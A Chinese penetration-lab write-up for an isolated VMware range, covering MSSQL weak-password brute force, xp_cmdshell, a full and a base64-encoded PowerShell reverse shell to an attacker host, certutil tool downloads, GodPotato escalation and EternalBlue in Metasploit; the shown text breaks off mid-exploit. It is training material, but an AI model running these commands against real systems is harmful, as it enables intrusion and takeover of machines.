内网渗透体系建设 — 靶场 WriteUp#
靶场简介#
官网搭建说明及镜像下载:https://book.nu1l.com/pentestbook/#/
镜像压缩包密码:关注Nu1L Team公众号(扫描下方二维码或者微信搜索Nu1L-Team),回复whoami获取即可
网络拓扑#
参考:https://book.nu1l.com/pentestbook/#/aerospace/README
| 节点 | IP | 服务 | 是否双网卡 | 是否域内 |
|---|
| Web01 | 网卡1:NAT 自动获取 / 网卡2:172.22.10.22 | IIS / SQL Server | 是 | 否 |
| WIN-PC8086 | 172.22.10.36 | 无 | 否 | aerospace.local |
| WIN-PC8098 | 172.22.10.40 | PHPStudy | 否 | aerospace.local |
| DC01 | 172.22.10.11 | AD DS | 否 | aerospace.local |
| CA | 172.22.10.13 | AD CS | 否 | aerospace.local |
环境部署#
通过 VMware Workstation 的"虚拟网络编辑器"创建一个新的网卡"VMnet13",选择"仅主机"模式,子网设置为 172.22.10.0/24。
创建完毕后,分别导入五台虚拟机节点即可。注意先后顺序。
虚拟机状态为挂起状态,直接点击继续运行即可,请勿做任何改动!!!
五台虚拟机导入 Vmware 后没有登录密码,需要通过渗透获取。Web01 是双网卡,可以得知其 NAT 网络的 IP,本次搭建为:192.168.93.146
攻击链路图#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| Web01 (192.168.93.146 / 172.22.10.22)
│ [MSSQL 弱口令 sa/123456 → xp_cmdshell → GodPotato 提权]
▼
WIN-PC8086 (172.22.10.36)
│ [MS17-010 永恒之蓝 → Mimikatz 抓取机器账户 Hash]
▼
WIN-PC8098 (172.22.10.40)
│ [约束委派 S4U2Self + S4U2Proxy → Mimikatz 抓取 liuyuhua 凭据]
▼
ADCS - AeroUser 模板 (ESC1 漏洞)
│ [certipy 申请域管证书 → LDAP Shell 改密码]
▼
DC01 (172.22.10.11) ── aerospace\Administrator
CA (172.22.10.13) ── aerospace\Administrator
|
第一阶段:Web01(192.168.93.146 / 172.22.10.22)#
1.1 扫描存活主机#
nmap -sn 192.168.93.1/24
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ┌──(xvsf㉿kali)-[~]
└─$ nmap -sn 192.168.93.1/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 07:56 -0400
Nmap scan report for 192.168.93.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.93.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:F3:8D:E9 (VMware)
Nmap scan report for 192.168.93.146
Host is up (0.00011s latency).
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Nmap scan report for 192.168.93.147
Host is up (0.0014s latency).
MAC Address: 00:0C:29:CB:A2:FE (VMware)
Nmap scan report for 192.168.93.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:ED:02:1A (VMware)
Nmap scan report for 192.168.93.128
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.00 seconds
|
其中 192.168.93.1 和 192.168.93.254 属于网关地址,128 是 kali 本身,146 是 Web01。
1.2 扫描端口#
nmap 192.168.93.146
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(xvsf㉿kali)-[~]
└─$ nmap 192.168.93.146
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 08:07 -0400
Nmap scan report for 192.168.93.146
Host is up (0.00044s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds
|
nmap -sV -sC -p21,80,1433,5985 192.168.93.146
-sV:探测服务版本号-sC:运行默认 NSE 脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| ┌──(xvsf㉿kali)-[~]
└─$ nmap -sV -sC -p21,80,1433,5985 192.168.93.146
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 08:11 -0400
Nmap scan report for 192.168.93.146
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Home
| http-methods:
|_ Potentially risky methods: TRACE
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.4001.00; SP1
| ms-sql-ntlm-info:
| 192.168.93.146:1433:
| Target_Name: WIN-IISSERVER
| NetBIOS_Domain_Name: WIN-IISSERVER
| NetBIOS_Computer_Name: WIN-IISSERVER
| DNS_Domain_Name: WIN-IISSERVER
| DNS_Computer_Name: WIN-IISSERVER
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 192.168.93.146:1433:
| Version:
| name: Microsoft SQL Server 2016 SP1
| number: 13.00.4001.00
| Product: Microsoft SQL Server 2016
| Service pack level: SP1
| Post-SP patches applied: false
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft
HTTPAPI/2.0
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
1.3 FTP 枚举#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| ┌──(xvsf㉿kali)-[~]
└─$ ftp 192.168.93.146
Connected to 192.168.93.146.
220 Microsoft FTP Service
Name (192.168.93.146:xvsf): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
Remote directory: /
ftp> dir -a
229 Entering Extended Passive Mode (|||53362|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> bye
221 Goodbye.
|
FTP 确认为空,没有利用价值。
1.4 HTTP 目录扫描#
1
2
| ┌──(xvsf㉿kali)-[~]
└─$ dirsearch -u http://192.168.93.146
|
发现 /download 目录和 /reports 需要认证的页面,但没有直接可利用的入口。
1.5 MS-SQL 弱口令爆破#
1433 端口是 MS SQL Server 的默认端口,使用 hydra 爆破:
hydra -l sa -P /usr/share/wordlists/rockyou.txt 192.168.93.146 mssql -t 4
获得凭据:sa / 123456,这是 MS-SQL 的最高权限账户。
1.6 连接 MS-SQL 并获取系统权限#
impacket-mssqlclient sa:123456@192.168.93.146
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(xvsf㉿kali)-[~]
└─$ impacket-mssqlclient sa:123456@192.168.93.146
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-IISSERVER): Line 1: 已将数据库上下文更改为 "master"。
[*] INFO(WIN-IISSERVER): Line 1: 已将语言设置更改为 简体中文。
[*] ACK: Result: 1 - Microsoft SQL Server 2016 (SP1) (13.0.4001)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
|
开启 xp_cmdshell 并执行系统命令:
1
2
3
4
5
6
7
8
9
10
| SQL (sa dbo@master)> EXEC sp_configure 'show advanced options', 1;
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami';
output
----------------------
nt service\mssqlserver
NULL
|
确认当前用户为 nt service\mssqlserver,操作系统为 Windows Server 2019 Datacenter,双网卡(192.168.93.146 / 172.22.10.22)。
1.7 反弹 Shell#
1
2
3
4
5
6
7
8
9
10
| # Kali 上生成 Base64 编码的 PowerShell 反弹命令
echo '$client = New-Object System.Net.Sockets.TCPClient("192.168.93.128",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t UTF-16LE | base64 -w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADkAMwAuADEAMgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA
# SQL 会话中执行
EXEC xp_cmdshell 'powershell -nop -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADkAMwAuADEAMgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA';
# Kali 另一个终端监听
nc -lvnp 4444
|
1.8 GodPotato 提权#
当前用户拥有 SeImpersonatePrivilege 权限,可以使用 Potato 类工具提权到 SYSTEM。
GodPotato 地址:https://github.com/BeichenDream/GodPotato
1
2
3
4
5
6
7
8
| # Kali 开启 HTTP 服务
python3 -m http.server 8080
# 目标机器下载
certutil -urlcache -split -f http://192.168.93.128:8080/GodPotato-NET4.exe C:\Windows\Temp\GodPotato.exe
# 测试提权
C:\Windows\Temp\GodPotato.exe -cmd "whoami"
|
1
2
3
4
| PS C:\Windows\system32> C:\Windows\Temp\GodPotato.exe -cmd "whoami"
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2684
nt authority\system
|
提权成功!再次用 GodPotato 反弹一个 SYSTEM 权限的 Shell:
1
| C:\Windows\Temp\GodPotato.exe -cmd "powershell -nop -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADkAMwAuADEAMgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA"
|
1.9 内网存活扫描#
上传 fscan 扫描内网网段 172.22.10.0/24:
1
2
| certutil -urlcache -split -f http://192.168.93.128:8080/fscan.exe C:\Windows\Temp\fscan.exe
C:\Windows\Temp\fscan.exe -h 172.22.10.1/24
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
| PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.93.128:8080/fscan.exe C:\Windows\Temp\fscan.exe
**** ?? ****
000000 ...
6ee000
CertUtil: -URLCache ???????
PS C:\Windows\system32> dir C:\Windows\Temp\
??: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2024/2/22 11:45 DiagTrack_alternativeTrace
d----- 2024/2/22 11:45 DiagTrack_aot
d----- 2024/2/22 11:45 DiagTrack_diag
d----- 2024/2/22 11:45 DiagTrack_miniTrace
d----- 2024/2/21 21:02 vmware-SYSTEM
-a---- 2024/2/21 21:55 1020 ASPNETSetup_00000.log
-a---- 2024/2/21 21:56 1022 ASPNETSetup_00001.log
-a---- 2026/3/20 22:05 0 fscan
-a---- 2026/3/20 22:22 7266304 fscan.exe
-a---- 2026/3/20 21:08 57344 GodPotato.exe
-a---- 2024/2/22 0:26 2696 MpCmdRun.log
-a---- 2026/3/20 21:11 45056 sam
-a---- 2024/2/22 11:46 103 silconfig.log
-a---- 2026/3/20 21:11 17252352 system
-a---- 2024/2/22 11:45 17470 vmware-vmsvc-SYSTEM.log
-a---- 2024/2/21 21:35 976 vmware-vmtoolsd-Administrator.log
-a---- 2024/2/22 11:45 1464 vmware-vmtoolsd-SYSTEM.log
-a---- 2024/2/22 11:45 6374 vmware-vmusr-Administrator.log
-a---- 2024/2/22 11:45 958 vmware-vmvss-SYSTEM.log
PS C:\Windows\system32> C:\Windows\Temp\fscan.exe -h 172.22.10.1/24
start infoscan
(icmp) Target 172.22.10.11 is alive
(icmp) Target 172.22.10.13 is alive
(icmp) Target 172.22.10.22 is alive
(icmp) Target 172.22.10.36 is alive
(icmp) Target 172.22.10.40 is alive
[*] Icmp alive hosts len is: 5
172.22.10.40:7680 open
172.22.10.11:88 open
172.22.10.40:3306 open
172.22.10.22:1433 open
172.22.10.40:445 open
172.22.10.36:445 open
172.22.10.22:445 open
172.22.10.13:445 open
172.22.10.11:445 open
172.22.10.40:139 open
172.22.10.36:139 open
172.22.10.22:139 open
172.22.10.13:139 open
172.22.10.11:139 open
172.22.10.40:135 open
172.22.10.36:135 open
172.22.10.22:135 open
172.22.10.13:135 open
172.22.10.11:135 open
172.22.10.40:80 open
172.22.10.22:80 open
172.22.10.13:80 open
172.22.10.22:21 open
[*] alive ports len is: 23
start vulscan
[*] WebTitle http://172.22.10.13 code:200 len:703 title:IIS Windows Server
[+] ftp 172.22.10.22:21:anonymous
[+] MS17-010 172.22.10.36 (Windows 7 Professional 7601 Service Pack 1)
[+] MS17-010 172.22.10.11 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.10.40 AEROSPACE\WIN-PC8098
[*] NetInfo
[*]172.22.10.11
[->]DC01
[->]172.22.10.11
[*] NetInfo
[*]172.22.10.40
[->]WIN-PC8098
[->]192.168.93.147
[->]172.22.10.40
[*] NetInfo
[*]172.22.10.36
[->]WIN-PC8086
[->]172.22.10.36
[*] NetInfo
[*]172.22.10.13
[->]CA
[->]172.22.10.13
[*] NetBios 172.22.10.11 [+] DC:DC01.aerospace.local Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.10.13 CA.aerospace.local Windows Server 2016 Datacenter 14393
[+] PocScan http://172.22.10.13 poc-yaml-active-directory-certsrv-detect
[+] mssql 172.22.10.22:1433:sa 123456
?????23/23
[*] ??????,???: 1m48.9636068s
PS C:\Windows\system32>
|
关键发现:
- 172.22.10.36 (WIN-PC8086):存在 MS17-010 永恒之蓝漏洞(Windows 7 SP1)
- 172.22.10.11 (DC01):域控制器
- 172.22.10.13 (CA):证书服务器,检测到 AD CS 服务
- 172.22.10.40 (WIN-PC8098):域内工作站
第二阶段:WIN-PC8086(172.22.10.36)— 永恒之蓝#
2.1 MS17-010 利用#
WIN-PC8086 是 Windows 7 SP1,存在 MS17-010 漏洞,使用 Metasploit 攻击:
1
2
3
4
5
| use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.10.36
set lport 4444
run
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
| ┌──(xvsf㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*
*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*
*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*
*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*
*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*
*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*
*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*
*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*
*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*
*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*
*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*
*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*
*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*
*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*
*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*
*B0NG0R3* *Les Cadets Rouges*buf*
*Les Tontons Fl4gueurs* *404 : Flag Not Found*
*' UNION SELECT 'password* _________ __ *OCD247*Sparkle Pony*
*burner_herz0g* \_ ___ \_____ _______/ |_ __ _________ ____ *Kill$hot*ConEmu*
*here_there_be_trolls* / \ \/\__ \ \____ \ __\ | \_ __ \_/ __ \ *;echo"hacked"*
*r4t5_*6rung4nd4*NYUSEC* \ \____/ __ \| |_> > | | | /| | \/\ ___/ *karamel4e*
*IkastenIO*TWC*balkansec* \______ (____ / __/|__| |____/ |__| \___ > *cybersecurity.li*
*TofuEelRoll*Trash Pandas* \/ \/|__| \/ *OneManArmy*cyb3r_w1z4rd5*
*Astra*Got Schwartz?*tmux* ___________.__ *AreYouStuck*Mr.Robot.0*
*\nls*Juicy white peach* \__ ___/| |__ ____ *EPITA Rennes*
*HackerKnights* | | | | \_/ __ \ *guildOfGengar*Titans*
*Pentest Rangers* | | | Y \ ___/ *The Libbyrators*
*placeholder name*bitup* |____| |___| /\___ > *JeffTadashi*Mikeal*
*UCASers*onotch* \/ \/ *ky_dong_day_song*
*NeNiNuMmOk* ___________.__ *JustForFun!*
*Maux de tête*LalaNG* \_ _____/| | _____ ____ *g3tsh3Lls0on*
*crr0tz*z3r0p0rn*clueless* | __) | | \__ \ / ___\ *Phở Đặc Biệt*Paradox*
*HackWara* | \ | |__/ __ \_/ /_/ > *KaRIPux*inf0sec*
*Kugelschreibertester* \___ / |____(____ /\___ / *bluehens*Antoine77*
*icemasters* \/ \//_____/ *genxy*TRADE_NAMES*
*Spartan's Ravens* _______________ _______________ *BadByte*fontwang_tw*
*g0ldd1gg3rs*pappo* \_____ \ _ \ \_____ \ _ \ *ghoti*
*Les CRACKS*c0dingRabbits* / ____/ /_\ \ / ____/ /_\ \ *LinuxRiders*
*2Cr4Sh*RecycleBin* / \ \_/ \/ \ \_/ \ *Jalan Durian*
*ExploitStudio* \_______ \_____ /\_______ \_____ / *WPICSC*logaritm*
*Car RamRod*0x41414141* \/ \/ \/ \/ *Orv1ll3*team-fm4dd*
*Björkson*FlyingCircus* *PwnHub*H4X0R*Yanee*
*Securifera*hot cocoa* *Et3rnal*PelarianCP*
*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*
*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*
*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*
*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*
*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*
*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*
*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*
*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*
*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*
*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*
*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*
*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*
*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*
*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*
*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*
=[ metasploit v6.4.116-dev ]
+ -- --=[ 2,623 exploits - 1,326 auxiliary - 1,710 payloads ]
+ -- --=[ 432 post - 49 encoders - 14 nops - 10 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.22.10.36
rhosts => 172.22.10.36
